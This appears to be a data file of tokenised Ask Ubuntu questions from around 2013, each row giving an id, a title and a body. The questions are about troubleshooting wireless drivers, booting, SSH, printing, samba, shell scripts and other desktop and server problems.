284350	ndiswrapper netgear n300 , still not working	frustration beyond anything in windows ! i have used 12.10 on hp laptop no issues , decided to go with 12.10 on desktop ( amd32 ) , every thing went fine until loading usb wireless drivers . loaded/unloaded ndiswrapper what seems like 40 times , applied and finally did a build ( make , make install , modprobe ) and the card came up , but wo n't authenticate . i 'm not a guru on ubuntu , so my technical knowledge is limited . i have tried 2 cards now and no go . is this why ubuntu is not `` main stream '' . it seems so ridiculousness i ca n't get this to work , especially after purchase the card recommended in the hardware list . ( listed as `` pnp '' ) iwconfig lo no wireless extensions . eth0 no wireless extensions . lsusb bus 001 device 002 : id 0846:9020 netgear , inc. wna3100 ( v1 ) wireless-n 300 [ broadcom bcm43231 ] bus 002 device 002 : id 058f:9360 alcor micro corp. 8-in-1 media card reader bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
284353	taking out my subdirectory from my url	i am hosting my own site ... .. lets call it www.mysite.com . it is an online store , and i am using apache2 , and the magento community 1.7 platform . i had an `` under construction '' page set in usr/var/www/ folder ( while working on the site ) i also set a subdirectory in there called mystore . i was doing all my work on the site in the subdirectory . now i would like make the website pull up , by just the url , without using the subdirectory ( www.mysite.com/mystore/ ) . i have tried taking all the files from the subdirectory and placing them in usr/var/www . that did not work . when you go to pull up the page from your browser , it still trys to redirect you to the www.mysite.com/mystore . can someone please let me know how to do this ?
284357	ubuntu vs. kubuntu vs. xubuntu	is there a link or any side-by-side comparisons detailing why one would choose kubuntu or xubuntu over ubuntu ? i am running on a somewhat older machine ( dell optilplex 745 tower ) , so how would this figure into the decision ?
284359	can microsoft access files be edit in ubuntu ?	i am planning on making a new system of 6 computers for an office and wanted to use ubuntu as the main os . is there a program to either convert or be able to use those files so they can be used on ubuntu ?
284362	why ca n't ubuntu access my raspberry pi across lan ?	okay , i recently got a raspberry pi , and i got it connected to my wi-fi - i enabled the ssh and installed hiawatha , and i could access it just fine from my desktop , which was running puppy linux at that time . i could also access it just fine when booted into windows ( putty on win xp pro , ) and the netbook could access it via putty , as well . ( win 7 starter ) however , when i booted into ubuntu , all ssh , http , and https connections were refused . to confirm that it was ubuntu , and only ubuntu , that was having the connection issues , i rebooted into puppy linux - connected fine , and into windows - connected fine . the netbook could connect to all 3 services without issues either . it was just ubuntu that said connection refused . i 'd like to know what 's wrong - i 've already done all the basic troubleshooting : rebooting the rpi , rebooting my computer , rebooting the wireless router , etc . the raspberry pi has no firewall enabled , and my router offers all devices connected to lan unrestricted access to each other . i 've done extensive testing , and ubuntu has been proven beyond a shadow of a doubt to be the only one not willing to connect . update : just tested accessing via my external ip , and everything runs smoothly on ubuntu ! however , ubuntu still ca n't access the pi from anything local , and i just re-confirmed that my other os 's can . i think it 's weird that ubuntu has trouble connecting locally ( unlike my other os 's , ) but is just fine accessing the pi via my external ip.. update 2 : disabling my firewall lets me access the device , but the password reports as incorrect every . single . time . i 've tried typing it into gedit , then dragging-and-dropping it into the password prompt during ssh login , and it authorizes when accessing pi @ jamestheawesomedude.cu.cc , but not when accessing pi @ 192.168.2.128 . this is unbelievably frustrating .
284373	can xampp be used for a `` real '' server ?	according to the wikipedia article , xampp is merely a packaging of server software such as apache , php , sql , etc , that can be run locally . the question becomes : is it practical to use the same software on an actual server , but set a config file to automatically run /opt/lampp/lampp start on startup ? or is it better to just get the software and directly install it ? not too savvy with networking , particularly on the server side , so any answers would be a great help . thanks !
284379	how do i install cursors from the internet ?	i tried doing the answer from another question but i did n't have an .icons folder . how else can i install a cursor without using the software center ?
284382	installed ubuntu on chromebook , ubuntu asks for password that was n't ever set	i installed ubuntu 12.04 on my chromebook . it did n't asked me for a password at first , but when i attempted to install a software from the store it 's asking me for a password which i never set . as in chromebook , it does n't have a normal bios to reset the password , please tell me how can i reset the password or if there is any other way .
284384	failing with shell script	i am trying to run the following script in ubuntu 10.04 but hitting with different issues for the intget i declaration . could anyone please help me asap integer i i=1 while true do read response if [ -z == $ response ] then continue fi if [ $ response == `` q '' ] then break fi if [ -f /var/tmp/ue1_ $ { i } .txt ] then cat /var/tmp/ue1_ $ { i } .txt i= $ i+1 fi if [ $ i -eq 100 ] then break fi done
284385	ca n't get to login screen	ubuntu 12.04 has worked fine for a long time . after an update i turned the computer off , and when i turned it on the next day i got this screen : gnu grub version 1.99-21ubuntu3.9 ubuntu , with linux 3.2.0-40-generic ubuntu , with linux 3.2.0-40-generic ( recovery mode ) previous linux version memory test ( memtest86+ ) memory test ( memtest86+ , serial console 115200 ) press enter to boot selected os i do n't see 12.04 , my operating system , so i do n't know what to select .
284386	guided partitioning	i read from some documentation that using ubuntu 's guided partitioning defaults will create a root partition and a swap partition . however , when i used that approach it actually created 5 partitions , and only the root partition looks familiar : /dev/sdb5 227g 21g 194g 10 % / udev 1.5g 4.0k 1.5g 1 % /dev tmpfs 606m 844k 606m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.5g 152k 1.5g 1 % /run/shm what is udev , tmpfs , /run/lock/ and /run/shm ? what 's even more interesting about this situation is that the guided partition did n't even allow me to select the partition to use . it just ended up using ( wrongfully ) my storage sdb drive rather than using my sda ext4 partition of my sda drive .
284387	what to do to install ubuntu 12.10 in virtual pc on windows 7 enterprise ?	i had review many answers of how to install ubuntu in virtual pc and i tried them all but they all failed . i am not sure what i am doing wrong . i am using windows 7 enterprise . i had created the virtual machine with ram : 1024 mb and a dynamic expandable disc to 130 gb . after i started the virtual machine and tries a few times it gives up and comes up with a message : reboot and select proper boot device or insert boot media in selected boot device at this time i go to the tools menu and select the iso i downloaded from the settings menu i tried both the 12.10 and 12.04 isos and both have the same behaviour , it fails . i click ok. at this point not sure what to do , what i found was to click the ctrl+alt+del button at this point it prints a message which dissapear quite fast , so i am not sure what it says , it may record it somewhere , but not sure where . in any case the whole screen goes purple and the the virtual machine powers down , no installation was done . i also tried ronnie 's suggestion which i did not understand very well . i kept the shift key press down and what appear was : boot : did not know what to do here . i tried also robsdad suggestion and when i press the f6 key the menu for f2 key appear , so i selected english as my language , hit return and then the screen with the posibility of installing ubuntu came up . then i hit f6 before proceeding and chose nomodeset hit return and esc and continue to choose installing ubuntu but again the it failed . is there something i am doing wrong , or is there anything i am missing ? ? thanks jose
284393	ps3 controller problems	i 've gone thru a cpl walkthrus on how to get my ps3 controller working on ubuntu . i have a eee pc 1005hab and i get this far : type the following command to install the necessary usb library : sudo apt-get install libusb-dev libusb-0.1-4 connect the ps3 controller , then download the `` sixpair '' driver to your downloads directory type the following command to switch to the download directory : cd /home/user/downloads replace `` user '' with your user name . this is as far as i get then it says : bash : cd/ashley/downloads : no such file or directory cna anyone help please ( i 'm sorry if this is in the wrong place , i would be happy to repost if it is a problem )
284401	ubuntu installation on lenovo ideapad g780	i am not new to ubuntu however , i 'm having trouble installing it on a new lenovo ideapad laptop model g780 . it came pre-loaded with windows 8 . when i install ubuntu , it 's fine but at dual-boot it gives me the following error : file missing or corrupt /ubuntu/winboot/wubilder.mbr status 0x000007b i have to boot it from wubi because the cd/dvd is not listed when i press f12 to go to the boot menu .
284405	hp 2000 notebook pc freezes	i 'm not sure the of the model name , nor if that would help , but i believe it is this : hp 2000 notebook pc 2000-2b09wm . for some reason it likes to freeze randomly . i tried using the proprietary graphics driver , but that did n't help , except for make the experience unbearable . i am using ubuntu 13.04 , as any earlier versions are worse , and this version can handle all my hardware perfectly ( it 's also extraordinarily stable ) . the overall specs : amd e-300 1.3ghz dual core apu 4gb ram 64-bit system , 32-bit os ( this is n't the problem , or at least , not the only problem , as 64-bit works just as bad . ) this computer came with uefi boot , but i disabled it in the bios settings , and continued to change the hard drive from gpt to ms-dos i 'm kind of a newbie , so please , if there is anything else you would like to know ask away .
284407	upgraded to raring ringtail 13.04 , but not every package did ?	i just noticed while looking at a bunch of packages in synaptic that some are stuck at their quantal version although in their package settings shows a raring version , how do i make sure these packages update to their raring version without having to go one by one ? updated from quantal quetzal 12.10 64 bit to raring ringtail 13.04 64 bit via `` update-manager -d ''
284408	accidentally mounted iso on /home ! please help !	i was trying to install matlab on my computer , and i got an iso and used this command to mount it : sudo mount /path/to/iso /home/muhammad -t iso9660 -o loop as you can see , i forgot to type in one more folder and now my entire home directory has been overwritten ! i 'm freaking out to the max right now and am too scared to even suspend my laptop . please help me figure out how to undo this ! thank you ! ! ! !
284411	opencl sees duplicate adapter	i have a strange issue with opencl/app 2.8 on my 12.10 box . i had one 5830 and then added a 6850 . the aticonfig utility sees them correctly but opencl has a duplicate entry for the 5830 . $ aticonfig -- lsa * 0 . 01:00.0 ati radeon hd 5800 series 1 . 02:00.0 amd radeon hd 6800 series * - default adapter $ clinfo | grep `` board name\|device topology '' board name : ati radeon hd 5800 series device topology : pci [ b # 2 , d # 0 , f # 0 ] board name : ati radeon hd 5800 series device topology : pci [ b # 2 , d # 0 , f # 0 ] i ca n't figure out how to get opencl to reconfigure itself . i have previously had a similar configuration ( one 6850 and one 5830 but in reversed pci slots ) and had no issues . i then removed the 6850 and replaced it with a second 5830 but i could n't get that to work correctly . i was pretty sure opencl was confusing the two 5830s so i took one out and tried with just one , and that worked normally . i then put the 6850 in to see if it was having two identical cards that was the issue . any ideas ?
284419	undefined symbol error when running sdl program	i 've recently started playing around with sdl , following some tutorials online . i got a basic test program going , and it compiled fine , and it ran fine until recently . starting about two days ago , trying to run the binary ( the same binary , not re-compiled ) throws the following error : ./sdltest : symbol lookup error : /usr/local/lib/libsdl-1.2.so.0 : undefined symbol : _xgetrequest i 'm fairly confident i did n't install or remove anything since the program stopped working . i 'm running 12.10 ( have been since before i got this error , so i 'm pretty sure it 's not a 12.10 bug ) , and i 've been compiling with the following commands ( extracted from my makefile ) : g++ -c -o main.o main.cpp g++ -c -o capp.o capp.cpp g++ main.o capp.o -o sdltest -lsdl does anybody have any idea what went wrong , and what i might be able to do to fix it ?
284421	ethernet problem in ubuntu 13.04	ca n't wait till raring officially release , i decided to use daily-image of it . however , my ethernet is not working . can not be selected and activated to retrieve dhcp from my lan . it was working when i bootup my ubuntu with lan cable attached , but to day i rebooted many times with attached cable the ethernet still not working . wlan is working just fine .
284424	( xfce ) is there a way to make < super > not open my apps menu when using < super > r ?	i 'm using < super > r to open terminal , < super > l to lock etc . but i 've also got just < super > bound to xfce4-popup-applicationsmenu which emulates windows use . unfortunately when i do < super > r to open terminal ( or any other modified launch key ) it does both : terminal will open and the menu will open . any way to resolve that or is that key always going to be fired both standalone and as a modifier ? would moving to something like gala be a better solution ( a bit heavy for my tastes ) ?
284425	when updating and downloading packages what has the absolute freshest packages , the us server or the main ?	when selecting the server to download packages from in `` software & updates '' i have a choice between the us server and main server , which would be updated first and therefore have the absolute freshest packages ?
284427	how can i shift my monitor image to the right ?	i have a thinkpad x220 with a 1366x768 screen . however , a vertical band of around 300 pixels is now dead on the the left side , and i ca n't have it repaired for a few months . i thought one solution would be to switch to a 1024x768 resolution and shift the viewport ( this might be the incorrect term ) to the right so the whole desktop is outside the 'dead zone ' . i tried playing with xrandr but i ca n't make this work . any ideas ?
284430	command ps freezed . how to fix it ?	when i execute ps on the server runs ubuntu 12.04 , it always freeze . like this : root @ xxx : xxxxx # ps pid tty time cmd 26328 pts/1 00:00:00 sudo 26329 pts/1 00:00:00 su 26330 pts/1 00:00:00 bash signal 11 ( segv ) caught by ps ( procps version 3.2.8 ) please send bug reports and , this makes high load average as standing process . this error have never happens until i add many users that i must add . i searched on google many times , but i ca n't find how to fix it . could you tell me the solution ? sorry for my dirty english . p.s . : i run this machine on vmware esxi 5.1 . and , it is created by ubuntu 12.04 `` precise pangolin '' minimal cd . on this page https : //help.ubuntu.com/community/installation/minimalcd does it have connection with this error ?
284440	why id card reader is not working in ubuntu 12.04 , 12.10 ? using omnikey3121	i have this omnikey 3121 which is an usb id card reader . connected to my ubuntu . when i try to read belgiun id card or any other card it does not work always missing to provide results . how can i make sure the card is readable on every insert ? $ lsusb bus 003 device 008 : id 076b:3021 omnikey ag cardman 3121 $ ps -e | grep pcsc 16399 ? 00:00:00 pcscd $ service pcscd status * pcscd is running $ service pcscd restart * restarting pcsc lite resource manager pcscd [ ok ] $ opensc-tool -- list-readers # detected readers ( pcsc ) nr . card features name 0 no generic ccid reader 00 00 $ opensc-tool -- reader 0 -- atr matched atr in reader : generic ccid reader 00 00 failed to connect to card : unresponsive card ( correctly inserted ? ) $ opensc-tool -- reader 0 -- name matched atr in reader : generic ccid reader 00 00 failed to connect to card : unresponsive card ( correctly inserted ? ) $ opensc-tool -l detected readers ( pcsc ) nr . card features name 0 no generic ccid reader 00 00 $ opensc-explorer opensc explorer version 0.12.2 using reader with a card : generic ccid reader 00 00 failed to connect to card : unresponsive card ( correctly inserted ? ) $ pcsc_scan pc/sc device scanner v 1.4.20 ( c ) 2001-2011 , ludovic rousseau < ludovic.rousseau @ free.fr > compiled with pc/sc lite version : 1.8.3 using reader plug'n play mechanism scanning present readers ... 0 : generic ccid reader 00 00 fri apr 19 05:30:22 2013 reader 0 : generic ccid reader 00 00 card state : card removed , fri apr 19 05:30:59 2013 reader 0 : generic ccid reader 00 00 card state : card inserted , unresponsive card , fri apr 19 05:31:04 2013 reader 0 : generic ccid reader 00 00 card state : card removed , fri apr 19 05:33:31 2013 reader 0 : generic ccid reader 00 00 card state : card inserted , atr : 3b 98 13 40 0a a5 03 01 01 01 ad 13 11 atr : 3b 98 13 40 0a a5 03 01 01 01 ad 13 11 + ts = 3b -- > direct convention + t0 = 98 , y ( 1 ) : 1001 , k : 8 ( historical bytes ) ta ( 1 ) = 13 -- > fi=372 , di=4 , 93 cycles/etu 43010 bits/s at 4 mhz , fmax for fi = 5 mhz = > 53763 bits/s td ( 1 ) = 40 -- > y ( i+1 ) = 0100 , protocol t = 0 -- -- - tc ( 2 ) = 0a -- > work waiting time : 960 x 10 x ( fi/f ) + historical bytes : a5 03 01 01 01 ad 13 11 category indicator byte : a5 ( proprietary format ) possibly identified card ( using /usr/share/pcsc/smartcard_list.txt ) : 3b 98 13 40 0a a5 03 01 01 01 ad 13 11 belgium electronic id card
284441	hl-2240 brother not printing at margins	it seems like the left margin is fine , but the top and right margins over-run making it seem like the page is cut-off at top and right . it 's as if the page were printed too high and too far right . i installed the printer using the drivers from the brother website with the following procedure : sudo apt-get remove -- purge cups sudo apt-get install cups sudo apt-get install ia32-libs lib32stdc++6 sudo dpkg -i -- force-all ~/downloads/hl2240lpr-2.1.0-1.i386.deb sudo dpkg -i -- force-all ~/downloads/cupswrapperhl2240-2.0.4-2.i386.deb in properties i have manually set the page size to `` letter '' . ( it defaults to a4 ) . thoughts ?
284443	how can i remove a group and its ' users ?	i tried to create the svn user in my server , and i create a new group svn and add the current user maven to the group svn . sudo groupadd svn sudo chgrp svn /usr/local/svn/repos sudo usermod -a -g svn maven now i tried to remove subversion , and delete the groups . then i used : sudo groupdel svn when i tried to find the groups for my current user using : groups i got the messages : maven @ mac : /usr/local $ groups maven adm cdrom sudo dip plugdev lpadmin sambashare vboxusers groups : can not find name for group id 1001 1001 how can i fix this ?
284445	i need help with pantheon	i recently installed ubuntu 13.04 and i tried just straight up installing pantheon-shell , needless to say it 's pretty dysfunctional without any configuration ( then some things happened and stuff and now i 'm back to a clean install ) so my question is : has anyone seen a guide on getting pantheon-shell running proper-like in ubuntu ? if not does anyone know how i could go about working it out ? sub-unimportant-question : i also have steam installed as a desktop session and i was wondering if there was anyway to select which screen it uses . thanks guys sudo apt-get answers
284446	touchpad recognized as generic ps/2 mouse on a dell inspiron 13z 5323	after installing ubuntu my touchpad has basic functionality but no edge scrolling , multitouch , or any advanced features . xinput list shows it as a generic ps/2 mouse : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_hd id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=13 [ slave keyboard ( 3 ) ] there must be a way to change it to recognizing it as a touchpad , but i 'm pretty new to ubuntu and linux . my laptop is a dell inspiron 13z 5323 .
284447	prozgui not downloading larger files ?	downloading larger files using prozgui which is integrated with firefox by flashgot in ubuntu 12.04 gives following error : not enough storage space or storage media fails to create file i am using ubuntu 12.04 32 bit with gnome shell please help nad sorry for my poor english
284448	ubuntu touch tools	i 'm doing a porting exercise to port an application from ubuntu to ubuntu touch . the application uses gcc 4.1.2 , cmake 2.6.4 , binutils 2.22 . q1 . what tools are needed for setting up a ubuntu touch development environment ? i 've already seen this link and followed every step . the link does not installs any cross compiler but i guess i 'm gon na need a cross compiler too for compiling the applications for arm phones/tablets targets . q2 . the qt creator in this article can be configured to use cmake but if a new project is created with qt creator to use cmake 2.8 version . is cmake 2.6 compatible with qt creator 2.7 based on qt 5.0.1 ? q3 . is there any emulator available ? q4 . can a c++ code ( with no gui only one daemon that runs in background ) be compiled for ubuntu touch which works fine on ubuntu ?
284449	installing multiple ubuntu distros via wubi ?	i 've installed ubuntu via wubi , and i want to install other distros/desktop enviroments , like kde , xfce , etc . based on wubiguide : you can install your favorite distro from within wubi ( see the advanced settings ) and then once you are in ubuntu , you can install the other desktop environments as normal packages . each desktop environment is available as a single package ( e.g . kubuntu-desktop ) . you will not have to reboot to change the desktop , simply log-off and choose the desktop environment in the options at login . i did n't get meaning of that , so what should i do in order to install multiple distros on ubuntu ?
284450	how drivers ? thinkpad t430u	hi i recently installed ubuntu 13.04 onto my lenovo thinkpad t430u and as far as i can tell it 's all working but i would like to somehow confirm that all the drivers are functioning correctly , particularly the drivers for the nvidia 620m . i also have a small issue where hibernate is greyed out and can not be selected in the power management section of the settings panel . any help would be appreciated , if you ca n't help please bump
284452	how to access internet on laptop from blackberry 9300 curve mobile using bluetooth connection	please help me to make an internet connection using bluetooth in my laptop . i am using blackberry curve 9300 and hp probook 4440s with ubuntu 12.04 .
284459	could n't find any package by regex - ruby	i need to install ruby1.9.3-dev sudo apt-get install ruby1.9.3-dev reading package lists ... done building dependency tree reading state information ... done e : unable to locate package ruby1.9.3-dev e : could n't find any package by regex 'ruby1.9.3-dev' it happens despite the fact that i previously did sudo apt-get update , sudo apt-get upgrade and sudo apt-get -f install .
284472	i want to set up ipsec/ike for vpn connectivity from one site to another	i want to set up ipsec/ike for vpn , with ike phase and ipsek phase . my site runs ubuntu server and other site i want to connect to runs cisco device . i just want commands i will use on my site in ubuntu server .
284477	my ubuntu boot behavior is random	my newely installed ubuntu on an hp pavilion g7 is behaving weird in the loading ( booting ) process . it sometimes loads from the first time , it sometimes stucks at a purple screen for over 4 minutes . it sometimes stucks at a black screen and it sometimes loads with a dimmed screen . there is no way to predict how will the next boot / reboot process behave . it 's completely random , searched a lot and checked everything around here , played with the boot options like noacpi , nomodeset . i am not able to predict what goes wrong especially that sometimes it does load perfectly well . i am currently writing this from a successful boot after 4 unsuccessful trials . note : i sometimes get `` timeout : killing '/sbin/modprobe '' errors with a nonsplash boot .
284481	'd ' minimizes all windows on ubuntu when connecting with xrdp	currently i am working on a remote server using ubuntu yet the 'd ' key can not be used since it minimizes/maximizes all windows to show/hide desktop . many answers point to the fact that i should go to the shortcuts and disable the `` hide all windows ... '' mapping . edit : i did disable other similar mapping such as 'hide all normal windows ' which is set to disabled ( i cleared it with my backspace ) . yet this has no effect . or do i need to log off and on again ? my problem is that i do not have this shortcut mapping listed in the shortcuts settings ! i also can not find the global_keybindings directory that many solutions suggest.. i tried to use the character map when i needed 'd ' but when i was asked to authenticate an installation of a programm ( and my password has a 'd ' ) , and i pasted the character , authentication failed . i do n't know whether this is another issue or not . i do n't have to access to log on or off , so i restarted the vm from my azure , yet the same trouble was present . can you advice any work around ? @ oli - i tried using xev to check out the keyboard events i tried to press a normal letter 'b' keypress event , serial 35 , synthetic no , window 0x4000001 , root 0x2e , subw 0x0 , time 910899804 , ( 358 , -354 ) , root : ( 359,184 ) , state 0x0 , keycode 56 ( keysym 0x62 , b ) , same_screen yes , xlookupstring gives 1 bytes : ( 62 ) `` b '' xmblookupstring gives 1 bytes : ( 62 ) `` b '' xfilterevent returns : false keyrelease event , serial 35 , synthetic no , window 0x4000001 , root 0x2e , subw 0x0 , time 910900467 , ( 358 , -354 ) , root : ( 359,184 ) , state 0x0 , keycode 56 ( keysym 0x62 , b ) , same_screen yes , xlookupstring gives 1 bytes : ( 62 ) `` b '' xfilterevent returns : false -- -- then i pressed 'd ' : focusout event , serial 35 , synthetic no , window 0x4000001 , mode notifygrab , detail notifyancestor focusout event , serial 35 , synthetic no , window 0x4000001 , mode notifywhilegrabbed , detail notifynonlinear unmapnotify event , serial 35 , synthetic no , window 0x4000001 , event 0x4000001 , window 0x4000001 , from_configure no propertynotify event , serial 35 , synthetic no , window 0x4000001 , atom 0xc2 ( wm_state ) , time 910906044 , state propertynewvalue propertynotify event , serial 35 , synthetic no , window 0x4000001 , atom 0xa2 ( _net_wm_state ) , time 910906044 , state propertynewvalue propertynotify event , serial 35 , synthetic no , window 0x4000001 , atom 0xa2 ( _net_wm_state ) , time 910914112 , state propertynewvalue
284483	how can i configure password based access and list all shared directories ?	i 'm using ubuntu/samba and i seek for an explanation how to : put password protection access to computer , not on single directories list all directories that i share , and not search them manually i always put directories to permit guests , because when i do n't do that when i try access it says invalid permissions . i ca n't even use my root/user password combination to access .
284484	ca n't connect to the internet	i am able to connect to my wireless connection without any problems , but when i open firefox it says `` server not found '' . i am running ubuntu 12.10 trough live usb on my acer aspire one netbook . pinging my router works fine . i have also changed servername to 8.8.8.8 . pinging it does n't work . it just says ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . when i cancel the operation i get the following `` 170 packets transmitted , 0 received , 100 % packed loss , time 168999ms '' any solution ? thank you for your help .
284485	computer fails to boot properly after vmware workstation 9 was installed on ubuntu 12.04	i 'm running ubuntu 12.04 3.5.0-27-generic on an hp dm4-1028tx . i just reinstalled ubuntu 12.04 after encountering problems with ubuntu 12.10 . i was installing vmware workstation 9 after uninstalling vmware player when it crashed and rebooted and i ended up with the screen shown in the pictures below : i managed to uninstall workstation via the root shell but i 'd still like to be able to install it again . has anyone faced the same problem ? any tips on how to debug the issue ?
284493	avoid `` save for web '' in gimp	previously gimp could directly open and save jpeg and png-images . since ubuntu 12.10 gimp is upgraded and requires me to save via a `` save for web '' -dialog . i have several issues with this dialog and consider it a severe regression : it does not open the location-dialog in the folder where the `` current image '' lives . requiring deep clicking . when chaning some details in the image , re-saving it as png or jpg requires me to go through all the steps instead of hitting a shortcut [ ctrl ] - [ s ] . when opening a jpg , gimp forces me to save the image as xcf ; probably so it can retain information ; which makes little sense , because the jpg it opened is already lossy ( lost information ) . is there a ( hidden ) setting to revert to the previous situation or to tweak the current one ? am i doing something wrong ? i can hardly beleive that one of the most important usages of gimp ( preparing images for web ) has such a severe lack of detailed finishing . is there a bug- or issue in the gimp issuetracker that i am not aware of , which deals with these issues ?
284494	flashing screen	i have just installed 12.10 . problem is the screen keeps flashing . maybe something to do with the video card ? very annoying as i can hardly see what i am typing here ! any ideas as to what i must do to correct this ?
284495	league of legends client continuous patch using playonlinux ?	i am using wine 1.5.28 and im not really sure which pol i am using it was an updated one though . i installed league using pol and ran the client . it installed fine and patched fine except for taking much longer than windows would have and seeming to freeze at points but after 2 hours of letting it patched i finally got the shiny gold button play : ) well i was able to login in , i did not try a game yet though because i had to leave for work . so i exited out and when i came home i clicked on pol and clicked run on lol and for some reason it wanted to do the same 2 hour patch all over again . does anyone know why this is or has experienced this same problem . it seems like every time i want to play it i will have to let it run its patch.. tl ; dr lol client wants to patch the same 2 hour patch every time i run it on pol
284498	nvidia-setting not restoring settings properly after login	i finally was able to setup a triple-head setup on a nvidia card using nvidia-settings and arrange the monitors accordingly . i also used the option to save the settings to the xorg.conf - but when i restart the computer , the monitor configuration is wrong ( one monitor overlaps with the other one ) . the monitors are all the same type .
284500	/run/lock and /run/shm missing	recently i found /run/lock and /run/shm folders to be missing . i tried to recover some files with a mounted disk , i now know that this may caused the harm . so unaware what to do , i created these directories by myself . now i looked up the command df -h and saw this output : filesystem size used avail use % mounted on /dev/sda6 913g 69g 798g 8 % / udev 5,9g 4,0k 5,9g 1 % /dev tmpfs 2,4g 872k 2,4g 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 5,9g 2,1m 5,9g 1 % /run/shm /dev/sda1 915m 358m 509m 42 % /boot i did n't know there were such file systems , how can i mount them in again ? is this something harmful ? i also saw that i have high i/o with my journal jbd2/sda6-8 always around 40 % , has this something to do with this ?
284516	multiple user account bit-torrent client	so i recently setup ubuntu 12.04 , and currently looking for a bit-torrent client where i can create multiple user accounts . the plan is to have more than 1 user accounts , and each user can monitor their activity via web-interface . so far after did a bit of research i found : deluge ( which offers multiple user-interface ) rtorrent ( which i would love to use this due to its light-weightedness ) . can anyone point me to the right direction ?
284518	can not install ubuntu on samsung ultrabook series 5 ( win 7 ! )	i have a samsung ultrabook series 5 with windows 7 ( which i want to keep ) ... i can boot from a usb stick without a problem and ubuntu work fine , but when i want to install it , the installation progress is stopped and it wo n't go further . it stop with the message : checking filesystem before that , i got also a message , that the system ca n't unmount the /cdrom ( which the ultrabook does n't have ! ) thank you very much for help !
284522	fn key does n't work inside shell	i 've installed xubuntu 12.10 and i 've occours that fn key ( i used that for type / ) does n't work inside standard shell ( but it works in the rest of programs ) . how can i fix it ?
284525	how to encrypt full disk after installing ubuntu 12.10 ?	i found that we can encrypt full disk with old version of ubuntu . i want to do the same with ubuntu 12.10 but i do n't understand the scripts that run when starting with initramfs . so anyone is ever did it ?
284531	listview does n't appear	i 'm working at app for ubuntu touch . i have a code with listview in it . but when i run it the page is simply empty ( tehre is a title and a tabs switcher ) . where is the mistake ? import qtquick 2.0 import ubuntu.components 0.1 import ubuntu.components.listitems 0.1 as listitem import qtquick.xmllistmodel 2.0 mainview { applicationname : `` el wohust '' objectname : `` elwohust '' width : units.gu ( 50 ) height : units.gu ( 75 ) xmllistmodel { id : portals source : `` http : //localhost/feed.xml '' query : `` /portals/item '' xmlrole { name : `` title '' ; query : `` title/string ( ) '' } xmlrole { name : `` pubdate '' ; query : `` pubdate/string ( ) '' } } // here tab { title : i18n.tr ( `` 2nd list '' ) page { id : subreddits anchors.fill : parent listview { id : articlelist model : portals delegate : listitem.subtitled { text : title subtext : pubdate progression : true onclicked : pagestack.push ( articleview ) } } } } } } here is how the xml file looks like : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < portals > < item > < title > karlův most < /title > < pubdate > sat , 07 sep 2010 10:00:01 gmt < /pubdate > < /item > < item > < title > sv . vít < /title > < pubdate > sat , 07 sep 2010 15:35:01 gmt < /pubdate > < /item > < /portals >
284533	how can i enable gui mode at ubuntu lts 12.04 server ?	i want enable a gui mode over ubuntu 12.04 lts server . kindly suggest a solution for me so that i can use the server with a gui .
284534	which software is used in ubuntu for supporting gill sans font just like ms office in windows	which software is used in ubuntu for supporting `` gill sans '' font just like `` ms office '' in windows .
284536	will `` persistent '' data from usb `` try ubuntu '' be saved when i install it to my laptop ?	i 'm using quantal from a usb stick ( created with linux live usb creator ) with persistence . if at a later i choose to install ubuntu to a laptop ( using the `` install '' icon ) will my changes be included in the installation ?
284539	print text file every three line start at 2nd line	i have done it with simple loop to count and print through.. how can i do it in bash scripting with program such as sed , awk ?
284540	how to restore default ubuntu startup splash screen ?	some time ago i changed the default startup of my ubuntu 12.04 . i did it in this way : sudo apt-get -- purge remove usplash and sudo apt-get usplash=0 now , during startup i see white letters on black background . no ubuntu-logo . could you please tell me how i can restore default ubuntu startup-splash ? i tried to install usplash with no luck : adam @ myubuntu : ~ $ sudo apt-get install usplash [ sudo ] password for adam : reading package lists ... readybuilding dependency treereading state information ... readypackage usplash is not available , but is referred to by another package.this usually means that the package is missing , has been replaced by anotheror package is not available at another source . also i set grub_cmdline_linux_default= '' quiet splash '' and used sudo update-grub help is appreciated ! ~regards
284543	start and stop parameters in init script	i have .conf a file in /etc/init/ with this code at the bottom : start on ( started network-interface or started network-manager or started networking ) stop on ( stopping network-interface or stopping network-manager or stopping networking ) i understand this means that it is launched whenever the system boots . anyway , is it possible to have a more accurate information about each one of these events ? man initctl does not provide a comprehensive list of them and googling is not very successful so far .
284549	terminal closes when i run shell script	i wrote my own shell script , and i made it executable with `` chmod +x '' command . but when i click to shell file and want to run it in terminal , it suddenly opens and then closes in a second . what is the problem ?
284551	performance problems with 13.04 and virtualbox	i just installed ubuntu 13.04 ( daily , full updated ) and installed windows 8 in virtualbox . when windows 8 is running a have huge performance issues on ubuntu . last week i had the same setup with ubuntu 12.04 ( full updated ) and i had no problem with the overall performance . where is the problem and how can i fix it ? pc : ubuntu 13.04 x64 4 gib ram 4x3,1 ghz intel sandybridge on-board graphics vbox : windows 8 x86 1 gib ram 1 cpu graphics memory 128mb guest-extension is installed 3d-acceleration active
284553	ubuntu 12.10 does not scan for new wireless after disconnect	new ubuntu 12.10 install on a samsung np700z5c-s01ub series 7 laptop - 15.6 '' works great . but when the wireless disconnects ( due to moving around ) , the machine will not scan for new networks unless rebooted ? i can check and uncheck wireless on the bug but it will not scan for networks unless rebooted .
